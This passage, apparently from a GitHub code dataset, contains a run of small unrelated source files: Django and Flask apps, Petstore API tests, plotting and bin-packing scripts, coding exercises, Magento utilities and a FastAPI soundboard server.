openApp_logIn(\"C:\\iNEX\\Client\\G2ConfTool.exe\",Pattern(\"1486530419073.png\").similar(0.92))\n","repo_name":"OldFeelLee/sikuliProject","sub_path":"legacy/AutoInstall/OEM_Conf.sikuli/OEM_Conf.py","file_name":"OEM_Conf.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31862247711","text":"from django.test import TestCase \nfrom django.contrib.auth import get_user_model\nfrom accounts.authentication import PasswordlessAuthenticationBackend as pwdlessBackend\nfrom accounts.models import Token\n\nUser = get_user_model()\n\n\n\nclass AuthenticateTest(TestCase):\n def test_returns_None_if_no_token(self):\n the_user = pwdlessBackend().authenticate(\"no-such-token\")\n self.assertIsNone(the_user)\n \n def test_returns_new_user_from_email_if_token(self):\n an_email = \"test_user@example.com\"\n token = Token.objects.create(email=an_email)\n new_user = pwdlessBackend().authenticate(token.uid)\n the_user = User.objects.get(email=an_email)\n self.assertEqual(the_user, new_user)\n\n def test_returns_existing_user_from_email_if_token(self):\n an_email = \"test_user@example.com\"\n existing_user = User.objects.create(email=an_email)\n token = Token.objects.create(email=an_email)\n the_user = pwdlessBackend().authenticate(token.uid)\n self.assertEqual(the_user, existing_user)\n\n\nclass GetUserTest(TestCase):\n def test_get_user_by_email(self):\n User.objects.create(email=\"second_test@example.com\")\n existing_user = User.objects.create(email=\"test_user@example.com\")\n the_user = pwdlessBackend().get_user(email=\"test_user@example.com\")\n self.assertEqual(the_user, existing_user)\n\n def test_returns_None_if_no_user_email(self):\n the_user = pwdlessBackend().get_user(email=\"test_user@example.com\")\n self.assertIsNone(the_user)\n\n\n\n\n\n\n\n","repo_name":"Diego-MX/squash-app","sub_path":"accounts/tests/test_authentication.py","file_name":"test_authentication.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70400108722","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import Click\n\nimport json\n\n# fakeDB = [{'date':\"02-02-2021\", 'time':\"05:45:32\", 'x':1, 'y':2, 'hue':255}]\n\n@csrf_exempt\ndef index(request):\n return HttpResponse(\"heellloooOOOOOOO\")\n\n@csrf_exempt\ndef all(request):\n allClicks = list(Click.objects.values())\n # print(allClicks)\n # return JsonResponse(fakeDB, safe=False, status=200)\n return JsonResponse(allClicks, safe=False, status=200)\n\n@csrf_exempt\ndef new(request):\n errorMessage = validInput(request)\n if len(errorMessage) > 0:\n error = {}\n error[\"message\"] = errorMessage\n return JsonResponse(error, status=400)\n\n data = request.body.decode('utf-8')\n data_json = json.loads(data)\n\n click = Click(x=data_json['x'], y=data_json['y'],hue=data_json['hue'])\n click.save()\n # newData = {'date':\"\", 'time':\"\", 'x':data_json['x'], 'y':data_json['y'], 'hue':data_json['hue']}\n # fakeDB.append(newData)\n # print(fakeDB)\n return HttpResponse(\"added!\")\n\ndef validInput(request):\n if request.method == 'POST':\n data = request.body.decode('utf-8')\n data_json = json.loads(data)\n\n if len(data) == 0:\n return \"fields cannot be empty.\"\n requestFields = data_json.keys()\n expectedFields = [\"x\", \"y\", \"hue\"]\n diff = requestFields - expectedFields\n if len(diff) > 0:\n badField = diff.pop()\n # return error message about bad field\n return badField + \" not recognized.\"\n\n # check for empty field value\n for field in requestFields:\n if data_json[field] is None or data_json[field] == \"\":\n return field + \" cannot be empty.\"\n \n else:\n return \"not post request\"\n \n # no errors\n return \"\"","repo_name":"avelaga/connected_world_api","sub_path":"connected_world_api/clicks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16624035242","text":"from flask import Flask, jsonify, render_template, request\nfrom flask_socketio import SocketIO\nimport Adafruit_DHT\nimport time\nimport datetime\nimport threading\nimport requests\nfrom config import API_KEY\n\nAPI_URL = \"http://api.weatherapi.com/v1/current.json\"\n\ncurrent_city = \"Vancouver\"\n\napp = Flask(__name__)\nsocketio = SocketIO(app)\n\nsensor = Adafruit_DHT.DHT22\ngpio_pin = 4\n\ntemperature = 0.0\nhumidity = 0.0\ncurrent_time = datetime.datetime.now()\n\nsensor_thread_running = True\nconnected_clients = set()\n\n\ndef read_sensor():\n global temperature, humidity, current_time, sensor_thread_running\n while sensor_thread_running:\n # Read temperature and humidity data from the sensor\n new_humidity, new_temperature = Adafruit_DHT.read_retry(sensor, gpio_pin, delay_seconds=0.1)\n \n # Update the global variables only if the data retrieval was successful\n if new_humidity is not None and new_temperature is not None:\n temperature = new_temperature\n humidity = new_humidity\n current_time = datetime.datetime.now()\n \n # Wait for some time before taking the next reading (e.g., 2 seconds)\n time.sleep(2)\n\ndef get_weather_data(city):\n params = {\n \"key\" : API_KEY,\n \"q\" : city\n }\n try:\n # Send GET request to the API\n response = requests.get(API_URL, params=params)\n response.raise_for_status() # Raise an exception for unsuccessful requests\n data = response.json()\n \n # Extract relevant weather information from the response\n temperature = data[\"current\"][\"temp_c\"]\n humidity = data[\"current\"][\"humidity\"]\n\n # Display the weather information\n return {\"city_temp\" :temperature,\n \"city_humid\" : humidity}\n\n except requests.exceptions.RequestException as e:\n print(f\"Error occurred: {e}\")\n\n\ndef background_task():\n while sensor_thread_running:\n if connected_clients:\n data = {'temperature':temperature, 'humidity': humidity, **get_weather_data(current_city)}\n socketio.emit('update_data', data, namespace='/data')\n socketio.sleep(2)\n\n@socketio.on('connect', namespace='/data')\ndef handle_connect():\n connected_clients.add(request.sid)\n\n@socketio.on('disconnect', namespace='/data')\ndef handle_disconnect():\n connected_clients.remove(request.sid)\n\n@app.route('/api/data')\ndef get_data():\n data = {\n 'temperature': temperature,\n 'humidity': humidity,\n 'time' : current_time\n }\n return jsonify(data)\n\n@app.route('/')\ndef index():\n return render_template('index.html', temperature=temperature, humidity=humidity)\n\n\nif __name__ == '__main__':\n sensor_thread = threading.Thread(target=read_sensor)\n sensor_thread.start()\n\n socketio.start_background_task(target=background_task)\n try:\n socketio.run(app,host='0.0.0.0', port=5000)\n finally:\n sensor_thread_running = False\n sensor_thread.join()","repo_name":"tokiimugi/pi_temp_humid","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34750912133","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nplt.axis('equal')\n\n#PLOT ENVIRONMENT\nplt.plot([0, 0, 1, 1, 0], [0, 1, 1, 0, 0], marker='', color='black', linewidth=2) \n\n#PLOT OBSTACLES \nplt.plot([0.3, 0.3, 0.7, 0.7, 0.3], [0.2, 0.0, 0.0, 0.2, 0.2], marker='', color='olive', linewidth=2) \nplt.plot([0.4, 0.4, 0.6, 0.6, 0.4], [1.0, 0.7, 0.7, 1.0, 1.0], marker='', color='olive', linewidth=2) \n\n#PLOT GOAL REGIONS \nplt.plot([0.1, 0.1, 0.3, 0.1], [0.9, 0.7, 0.7, 0.9], marker='', color='blue', linewidth=2) \n#plt.plot([0.7, 0.7, 0.9, 0.7], [0.9, 0.7, 0.7, 0.9], marker='', color='blue', linewidth=2) \n#plt.plot([0.7, 0.7, 0.9, 0.7], [0.5, 0.3, 0.3, 0.5], marker='', color='blue', linewidth=2) \n#plt.plot([0.3, 0.3, 0.5, 0.3], [0.5, 0.3, 0.3, 0.5], marker='', color='blue', linewidth=2) \n\n#OPEN PATH FILE & PLOT PATHS\nfile = open('paths.txt', 'r') \n\nwhile True: \n\tline = file.readline()\n\tif not line: break;\n\n\tline = line.rstrip(' \\n')\n\tx = line.split(' ')\n\tx = map(float,x)\n\n\tline = file.readline()\n\tline = line.rstrip(' \\n')\n\ty = line.split(' ')\n\ty = map(float,y)\n\n\tplt.plot(x, y, marker='', color='red', linewidth=0.5) \n\n#PLOT INIT\nplt.plot( x[-1], y[-1], marker='o', markerfacecolor='red', markersize=2)\n\n#SHOW PLOT & SAVE\nfig = plt.gcf()\nfig.savefig('plot.png')\nplt.show()","repo_name":"savini-prem/RRTstar","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"16645313062","text":"import json\nimport requests\nimport os\n\n\ndef test_create_user(): # Verify that allows creating a User\n\n url = \"https://petstore.swagger.io/v2/user\"\n payload = json.dumps({\n \"id\": 160911,\n \"username\": \"test\",\n \"firstName\": \"test\",\n \"lastName\": \"test\",\n \"email\": \"test@mailinator.com\",\n \"password\": \"password\",\n \"phone\": \"777-77-77\",\n \"userStatus\": 0\n })\n headers = {\n 'Content-Type': 'application/json'\n }\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\n\n# Verify that allows login as a User\ndef test_login(): # Verify that allows creating a User\n\n url = \"https://petstore.swagger.io/v2/user/login?username=test&password=password\"\n\n payload = \"\"\n headers = {}\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\n\ndef test_create_list_user(): # Verify that allows creating the list of Users\n url = \"https://petstore.swagger.io/v2/user/createWithList\"\n\n payload = json.dumps([\n {\n \"id\": 0,\n \"username\": \"test1\",\n \"firstName\": \"test1\",\n \"lastName\": \"test1\",\n \"email\": \"test1\",\n \"password\": \"test1\",\n \"phone\": \"test1\",\n \"userStatus\": 0\n },\n {\n \"id\": 2,\n \"username\": \"test1\",\n \"firstName\": \"test1\",\n \"lastName\": \"test1\",\n \"email\": \"test1\",\n \"password\": \"test1\",\n \"phone\": \"test1\",\n \"userStatus\": 0\n }\n ])\n headers = {\n 'Content-Type': 'application/json'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\n\ndef test_log_out(): # Verify that allows Log out User\n url = \"https://petstore.swagger.io/v2/user/logout\"\n\n payload = \"\"\n headers = {}\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\n\ndef test_add_pet(): # Verify that allows adding a new Pet\n url = \"https://petstore.swagger.io/v2/pet\"\n\n payload = json.dumps({\n \"id\": 1232,\n \"category\": {\n \"id\": 1233,\n \"name\": \"string\"\n },\n \"name\": \"doggie\",\n \"photoUrls\": [\n \"string\"\n ],\n \"tags\": [\n {\n \"id\": 0,\n \"name\": \"string\"\n }\n ],\n \"status\": \"available\"\n })\n headers = {\n 'Content-Type': 'application/json'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\ndef test_update_pet_image(): # Verify that allows updating Pet’s image\n url = \"https://petstore.swagger.io/v2/pet/1232/uploadImage\"\n current_directory = os.getcwd()\n file_path = os.path.join(current_directory, 'files_for_test', 'images', 'download.jfif')\n payload = {}\n files = [\n ('file', ('download.jfif', open(file_path, 'rb'), 'application/octet-stream'))\n ]\n headers = {\n 'api_key': 'api_key'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload, files=files)\n\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\n\n# def test_update_data():# Verify that allows updating Pet’s name and status\n url = \"https://petstore.swagger.io/v2/pet/1232\"\n\n payload = {'name': ' totos',\n 'status': ' busy'}\n files = [\n\n ]\n headers = {}\n\n response = requests.request(\"POST\", url, headers=headers, data=payload, files=files)\n\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\ndef test_delete_pet(): # Verify that allows deleting Pet\n url = \"https://petstore.swagger.io/v2/pet/1232\"\n\n payload = {}\n files = {}\n headers = {\n 'api_key': 'api_key'\n }\n\n response = requests.request(\"DELETE\", url, headers=headers, data=payload, files=files)\n\n print(response.text)\n assert response.ok\n assert response.status_code == 200\n\n\n","repo_name":"Dmitry614/automation_learning","sub_path":"Automation_home_task/test_3.py","file_name":"test_3.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74093394481","text":"'''\nPartition a list into sublists whose sums don't exceed a maximum \n using a First Fit Decreasing algorithm. See\n http://www.ams.org/new-in-math/cover/bins1.html\n for a simple description of the method.\n'''\n\n\nclass Bin(object):\n \"\"\" Container for items that keeps a running sum \"\"\"\n def __init__(self):\n self.items = []\n self.sum = 0\n\n def append(self, item):\n self.items.append(item)\n self.sum += item\n\n def __str__(self):\n \"\"\" Printable representation \"\"\"\n return 'Bin(sum=%d, items=%s)' % (self.sum, str(self.items))\n\n\ndef pack(values, maxValue):\n values = sorted(values, reverse=True)\n bins = []\n\n for item in values:\n # Try to fit item into a bin\n for bin in bins:\n if bin.sum + item <= maxValue:\n #print 'Adding', item, 'to', bin\n bin.append(item)\n break\n else:\n # item didn't fit into any bin, start a new bin\n #print 'Making new bin for', item\n bin = Bin()\n bin.append(item)\n bins.append(bin)\n\n return bins\n\n\nif __name__ == '__main__':\n import random\n\n def packAndShow(aList, maxValue):\n \"\"\" Pack a list into bins and show the result \"\"\"\n print('List with sum ' + str(sum(aList)) + ' requires at least ' \\\n + str((sum(aList)+maxValue-1)/maxValue) + ' bins')\n\n bins = pack(aList, maxValue)\n\n print('Solution using' + str(len(bins)) + 'bins:')\n for bin in bins:\n print(str(bin))\n\n print\n\n\n aList = [10,9,8,7,6,5,4,3,2,1]\n packAndShow(aList, 11)\n\n aList = [ random.randint(1, 11) for i in range(100) ]\n packAndShow(aList, 11)\n\n","repo_name":"bpayne7/2D-Bin-Packing","sub_path":"ams.py","file_name":"ams.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"10441858410","text":"# Closest String\r\n# https://www.codewars.com/kata/6051151d86bab8001c83cc52/train/python\r\n\r\n# 정해진 시간안에 풀지 못했다.\r\n# 다른 사람의 풀이\r\nfrom itertools import product\r\ndef closest_string0(lst):\r\n maxHamDist = lambda w: max(sum(a!=b for a,b in zip(w,s)) for s in lst)\r\n return min( map(''.join, product(*map(set, zip(*lst))) ), key=maxHamDist )\r\n\r\n# 이해하기 쉬운 버전을 조금 수정했다.\r\nfrom collections import Counter\r\ndef closest_string(list_str):\r\n counters = [Counter(i) for i in zip(*list_str)]\r\n minweight = len(list_str[0]) + 1\r\n mins = None\r\n\r\n # backtracking with prunning:\r\n def rec(s, weights):\r\n nonlocal minweight, mins\r\n if max(weights) >= minweight:\r\n return\r\n if len(s) == len(list_str[0]):\r\n mins = s\r\n minweight = max(weights)\r\n return\r\n\r\n for c in counters[len(s)].keys():\r\n rec(s + c, [\r\n prevw + (c != list_str[i][len(s)])\r\n for i, prevw in enumerate(weights)\r\n ])\r\n\r\n rec('', [0]*len(list_str))\r\n return mins\r\n\r\ndef hamming_distance(str1, str2):\r\n l = 0\r\n for i in range(0, len(str2)):\r\n if str1[i] != str2[i]:\r\n l += 1\r\n return l\r\n\r\n\r\ndef compare(test_case_lists, str1, str2):\r\n distance1 = 0\r\n distance2 = 0\r\n if type(str1) != str:\r\n print('You did not return a string')\r\n elif len(str1) != len(str2):\r\n print('Length of string is invalid')\r\n else:\r\n for i in test_case_lists:\r\n distance1 = max(hamming_distance(str1, i), distance1)\r\n distance2 = max(hamming_distance(str2, i), distance2)\r\n print(distance1, distance2, 'Your maximum hamming distance is: ' + str(\r\n distance1) + ' with \\'' + str1 + '\\'\\nwhile the solution maximum is: ' + str(\r\n distance2) + ' with \\'' + str2 + '\\'\\n')\r\n\r\n\r\nl1 = ['ooi',\r\n 'oio',\r\n 'ooi']\r\nus = closest_string(l1.copy())\r\ncompare(l1, us, 'ooo')\r\nl2 = ['uvwx',\r\n 'xuwv',\r\n 'xvwu']\r\nus = closest_string(l2.copy())\r\ncompare(l2, us, 'uuwu')","repo_name":"whyj107/CodeWar","sub_path":"20230504_Closest String.py","file_name":"20230504_Closest String.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26871643965","text":"\nclass BankAccount:\n all_accounts = []\n # don't forget to add some default values for these parameters!\n def __init__(self, int_rate, balance): \n self.int_rate = int_rate\n self.balance = balance\n BankAccount.all_accounts.append(self)\n\n def deposit(self, amount):\n self.balance += amount\n return self\n\n def withdraw(self, amount):\n if self.balance < amount:\n print(\"Insufficient funds: Charging a $5 fee\")\n self.balance -= amount + 5\n return self\n else:\n self.balance -= amount\n return self\n\n def display_account_info(self):\n return f\"Balance: {self.balance}\"\n\n def yield_interest(self):\n self.balance = self.balance - (self.balance * self.int_rate)\n return self\n\n @classmethod\n def get_all_instances(cls):\n counter = 1\n account_list = \"-\"*50+\"\\n\"\n for account in cls.all_accounts:\n account_list += f\"account {counter}\\n\"\n account_list += f\" Interest Rate: {account.int_rate}\\n Balance: {account.balance}\\n\"\n counter += 1\n account_list += \"-\"*50+\"\\n\"*2\n return account_list\n\nclass User:\n def __init__(self, name, email):\n self.name = name\n self.email = email\n self.account = {\"checking\": BankAccount(0.02, 0),\"savings\": BankAccount(0.05, 600)}\n\n def make_deposit(self,account_name,amount):\n self.account[account_name].deposit(amount)\n return self\n\n def make_withdrawl(self,account_name,amount):\n self.account[account_name].withdraw(amount)\n return self\n\n def display_user_balance(self,account_name):\n print(f\"{self.name}'s Current {account_name} Balance is: {self.account[account_name].balance}\")\n return self\n\n def transfer_money(self,amount,other_user,account_name):\n self.account[account_name].balance -= amount\n other_user.account[account_name].balance += amount\n print(f\"You transferred {amount} to {other_user.name}!\")\n return self\n\n\n# account_1 = BankAccount(0.1, 0)\n# account_2 = BankAccount(0.15, 0)\n# account_3 = BankAccount(0.12, 0)\n\nperson_1 = User(\"Jerry\", \"jerry@email.com\")\nperson_2 = User(\"Alex\", \"alex@email.com\")\n\n# print(\"A\"*50)\n\n# print(account_1.deposit(50).deposit(100).deposit(85).withdraw(200).yield_interest().display_account_info())\n\n# print(account_2.deposit(100).deposit(150).withdraw(50).withdraw(100).withdraw(50).withdraw(55).yield_interest().display_account_info())\n\n# print(account_3.deposit(200).deposit(130).withdraw(50).withdraw(130).withdraw(50).withdraw(30).yield_interest().display_account_info())\n\n# print(\"B\"*50)\n\n# print(BankAccount.get_all_instances())\n\n# print(\"C\"*50)\n\nperson_1.make_deposit(\"checking\",500).display_user_balance(\"savings\")\nprint(\"A\"*50)\nperson_1.make_deposit(\"checking\",500).make_deposit(\"savings\",500).display_user_balance(\"savings\").display_user_balance(\"checking\")\nprint(\"B\"*50)\nperson_1.transfer_money(50,person_2,\"checking\")\nperson_2.display_user_balance(\"checking\")\n\n\n\n","repo_name":"xvaldez0411/python","sub_path":"fundamentals/oop/assignment_users_with_Bank_accounts/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9623759325","text":"#!/usr/bin/python3\n\"\"\"Defines a base class for the Almost a Circle project\"\"\"\n\n\nimport json\n\n\nclass Base:\n \"\"\"The superclass of the Almost a circle project\"\"\"\n\n __nb_objects = 0\n\n def __init__(self, id=None):\n \"\"\"Initializes the Base class\n\n Args:\n id: The identification for class initialization\n \"\"\"\n\n if id is not None:\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\" Returns the JSON string representation of a list of dictionaries\"\"\"\n if list_dictionaries is None or len(list_dictionaries) == 0:\n return []\n return json.dumps(list_dictionaries)\n\n @classmethod\n def save_to_file(cls, list_objs):\n \"\"\" Writes the JSON string representation of list_objs to a file\n\n Args:\n list_objs (list): A list of instances that inherit from Base\n \"\"\"\n with open(cls.__name__ + '.json', mode='w') as f:\n if list_objs is None:\n f.write(\"[]\")\n else:\n json_list = []\n for obj in list_objs:\n json_list.append(obj.to_dictionary())\n if len(json_list) > 0:\n f.write(Base.to_json_string(json_list))\n\n def from_json_string(json_string):\n \"\"\" Returns the list of the JSON string representation json_string\n\n Args:\n json_string: The string to be deserialized\n \"\"\"\n if json_string is None or json_string == \"[]\":\n return []\n else:\n return json.loads(json_string)\n\n @classmethod\n def create(cls, **dictionary):\n \"\"\"Returns an instance with all attributes already set\n\n Args:\n dictionary (dict): A dictionary of an instance's attributes and\n value\n \"\"\"\n if dictionary and dictionary != {}:\n if cls.__name__ == \"Rectangle\":\n obj = cls(1, 1)\n elif cls.__name__ == \"Square\":\n obj = cls(1)\n obj.update(**dictionary)\n return obj\n\n @classmethod\n def load_from_file(cls):\n \"\"\"Return a list of instances\n\n Returns:\n An empty list if the file doesn't exist.\n Otherwise - a list of instantiated classes.\n \"\"\"\n filename = str(cls.__name__) + \".json\"\n try:\n with open(filename, \"r\") as f:\n list_dicts = Base.from_json_string(f.read())\n return [cls.create(**d) for d in list_dicts]\n except IOError:\n return []\n","repo_name":"Wa2hingt0n/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1676205580","text":"# -*- coding: UTF-8 -*-\n'''\n magento.utils\n\n General purpose utility functions\n\n :license: BSD, see LICENSE for more details\n'''\nimport re\n\n\ndef expand_url(url, protocol):\n \"\"\"\n Expands the given URL to a full URL by adding\n the magento soap/wsdl parts\n\n :param url: URL to be expanded\n :param service: 'xmlrpc' or 'soap'\n \"\"\"\n if protocol == 'soap':\n ws_part = 'api/?wsdl'\n elif protocol == 'xmlrpc':\n ws_part = 'index.php/api/xmlrpc'\n else:\n ws_part = 'index.php/rest/V1'\n return url.endswith('/') and url + ws_part or url + '/' + ws_part\n\n\ndef camel_2_snake(name):\n \"Converts CamelCase to camel_case\"\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n","repo_name":"hanbiji/el_addons","sub_path":"magento_el/magento/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"75"} +{"seq_id":"70477571123","text":"import logging\nimport os\nimport secrets\nimport shutil\nimport sys\nfrom dataclasses import asdict, dataclass, field\nfrom glob import glob\n\nimport pkg_resources\nimport ujson\nimport uvicorn\nfrom fastapi import Depends, FastAPI, HTTPException, Request, status\nfrom fastapi.responses import HTMLResponse, JSONResponse\nfrom fastapi.security import HTTPBasic, HTTPBasicCredentials\nfrom fastapi.staticfiles import StaticFiles\n\nfrom simple_soundboard.mqtt_api import MQTTAPI\nfrom simple_soundboard.sound_engine import SoundEngine\n\nlogging.basicConfig(format=\"%(levelname)s: %(message)s\", level=logging.INFO)\nlogger = logging.getLogger()\n\nCONFIG_FOLDER = os.path.expanduser(\"~\") + \"/simple_soundboard/\"\nMEDIA_FOLDER = os.path.expanduser(\"~\") + \"/simple_soundboard/media/\"\nCONFIG_FILE = CONFIG_FOLDER + \"config.json\"\n\n\n@dataclass\nclass FileInfo:\n filename: str\n display_name: str = \"\"\n volume: float = 0.5\n is_music: bool = False\n is_folder: bool = False\n loop_playback: bool = False\n mqtt_topic: str = None\n icon: str = \"\"\n\n\n@dataclass\nclass FolderInfo:\n content: list[FileInfo] = field(default_factory=list)\n\n\nif not os.path.exists(CONFIG_FILE):\n os.makedirs(CONFIG_FOLDER, exist_ok=True)\n shutil.copy2(pkg_resources.resource_filename(__name__, \"config.json\"), CONFIG_FILE)\n\nif not os.path.exists(MEDIA_FOLDER):\n os.makedirs(MEDIA_FOLDER, exist_ok=True)\n\n\nsound_engine = SoundEngine()\nmqtt_api = MQTTAPI()\n\nsecurity = HTTPBasic()\napp = FastAPI()\napp.mount(\n \"/static\",\n StaticFiles(directory=pkg_resources.resource_filename(__name__, \"static\")),\n name=\"static\",\n)\n\n\ndef get_config():\n \"\"\"\n Returns config\n \"\"\"\n with open(CONFIG_FILE, \"r\", encoding=\"utf-8\") as file:\n config = file.read()\n file.close()\n return ujson.loads(config)\n\n\ndef init_folder_info_file(info_file_path):\n \"\"\"\n Init a folder content file\n \"\"\"\n with open(info_file_path, \"w\") as f:\n f.write(ujson.dumps(asdict(FolderInfo())))\n\n\ndef mqtt_enabled():\n mqtt_config = get_config()[\"mqtt\"]\n return bool(mqtt_config[\"mqtt_api_enabled\"])\n\n\ndef get_folder_info(relative_folder_path) -> FolderInfo:\n \"\"\"\n Returns folder info\n \"\"\"\n folder_info_file = f\"{MEDIA_FOLDER}{relative_folder_path}/folder_info.json\"\n\n if not os.path.exists(folder_info_file):\n init_folder_info_file(folder_info_file)\n try:\n with open(folder_info_file, \"r\") as f:\n folder_info = FolderInfo(**ujson.loads(f.read()))\n for i in range(len(folder_info.content)):\n folder_info.content[i] = FileInfo(**folder_info.content[i])\n except (ValueError, TypeError):\n folder_info = FolderInfo()\n save_folder_info(relative_folder_path, folder_info)\n\n return folder_info\n\n\ndef save_folder_info(relative_folder_path, folder_info):\n folder_info_file = f\"{MEDIA_FOLDER}{relative_folder_path}/folder_info.json\"\n with open(folder_info_file, \"w\") as f:\n f.write(ujson.dumps(asdict(folder_info), indent=4))\n f.close()\n\n\ndef get_current_username(credentials: HTTPBasicCredentials = Depends(security)):\n config = get_config()\n username_test = secrets.compare_digest(credentials.username, config[\"username\"])\n password_test = secrets.compare_digest(credentials.password, config[\"password\"])\n credential_test = username_test and password_test\n\n if not credential_test:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Incorrect login credentials\",\n headers={\"WWW-Authenticate\": \"Basic\"},\n )\n return credentials.username\n\n\n@app.get(\"/api/get_config\")\nasync def api_get_config(username: str = Depends(get_current_username)):\n \"\"\"\n Returns config\n \"\"\"\n config = get_config()\n return JSONResponse(config)\n\n\n@app.post(\"/api/get_folder_info\")\nasync def api_get_folder_info(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Returns folder info\n \"\"\"\n current_folder = await request.json()\n current_folder = current_folder[\"current_folder\"]\n\n config = get_folder_info(current_folder)\n initial_config = ujson.dumps(asdict(config))\n all_files = glob(f\"{MEDIA_FOLDER}{current_folder}/*\", recursive=False)\n\n for f in all_files:\n filename = f.split(MEDIA_FOLDER)[1]\n if any([x.filename == filename for x in config.content]):\n continue\n\n is_folder = os.path.isdir(f)\n\n if is_folder:\n config.content.append(FileInfo(filename, is_folder=True, icon=\"folder\"))\n else:\n extension = os.path.splitext(f)[1]\n if extension not in [\".mp3\", \".ogg\", \".wav\"]:\n continue\n config.content.append(FileInfo(filename))\n\n filtered_folder_info = FolderInfo()\n for file in config.content:\n if os.path.dirname(file.filename) != current_folder:\n continue\n if not os.path.exists(f\"{MEDIA_FOLDER}{file.filename}\"):\n continue\n if any([x.filename == file.filename for x in filtered_folder_info.content]):\n continue\n filtered_folder_info.content.append(file)\n\n final_config = ujson.dumps(asdict(filtered_folder_info))\n if initial_config != final_config:\n save_folder_info(current_folder, filtered_folder_info)\n\n return JSONResponse(asdict(filtered_folder_info))\n\n\n@app.post(\"/api/upload_file\")\nasync def api_upload_file(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Upload a file\n \"\"\"\n data = await request.body()\n filename = request.headers.get(\"filename\")\n current_folder = request.headers.get(\"current_folder\")\n\n extension = os.path.splitext(filename)[1]\n if extension not in [\".mp3\", \".ogg\", \".wav\"]:\n return JSONResponse({\"success\": False})\n\n with open(f\"{MEDIA_FOLDER}{current_folder}/{filename}\", \"wb\") as f:\n f.write(data)\n f.close()\n\n return JSONResponse({\"success\": True})\n\n\n@app.post(\"/api/delete_file\")\nasync def api_delete_file(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Delete a file\n \"\"\"\n file_info = await request.json()\n file_info = FileInfo(**file_info[\"file\"])\n if file_info.is_folder:\n shutil.rmtree(f\"{MEDIA_FOLDER}{file_info.filename}\")\n else:\n os.remove(f\"{MEDIA_FOLDER}{file_info.filename}\")\n\n return JSONResponse({\"success\": True})\n\n\n@app.post(\"/api/create_new_folder\")\nasync def api_create_new_folder(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Create a new folder\n \"\"\"\n file_info = await request.json()\n os.makedirs(f\"{MEDIA_FOLDER}{file_info['new_folder_name']}\", exist_ok=True)\n\n return JSONResponse({\"success\": True})\n\n\ndef api_play_sound(file_info: FileInfo):\n \"\"\"\n Plays a sound defined by FileInfo\n \"\"\"\n if mqtt_enabled() and file_info.mqtt_topic not in [\"\", None]:\n mqtt_api.mqtt.publish(f\"simple_soundboard/playing/{file_info.mqtt_topic}\")\n\n if file_info.is_music:\n sound_engine.play_music(\n f\"{MEDIA_FOLDER}{file_info.filename}\", file_info.volume, file_info.loop_playback\n )\n else:\n sound_engine.play_sound(f\"{MEDIA_FOLDER}{file_info.filename}\", file_info.volume)\n\n\n@app.post(\"/api/play_sound\")\nasync def web_ui_play_sound(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Plays a sound\n \"\"\"\n file_info = await request.json()\n file_info = FileInfo(**file_info[\"file\"])\n api_play_sound(file_info)\n return JSONResponse({\"success\": True})\n\n\n@app.get(\"/api/stop_sounds\")\nasync def api_stop_sounds(request: Request, username: str = Depends(get_current_username)):\n \"\"\"\n Stops all playing sounds\n \"\"\"\n if mqtt_enabled():\n mqtt_api.mqtt.publish(\"simple_soundboard/stopped_sounds\")\n sound_engine.stop_sounds()\n return 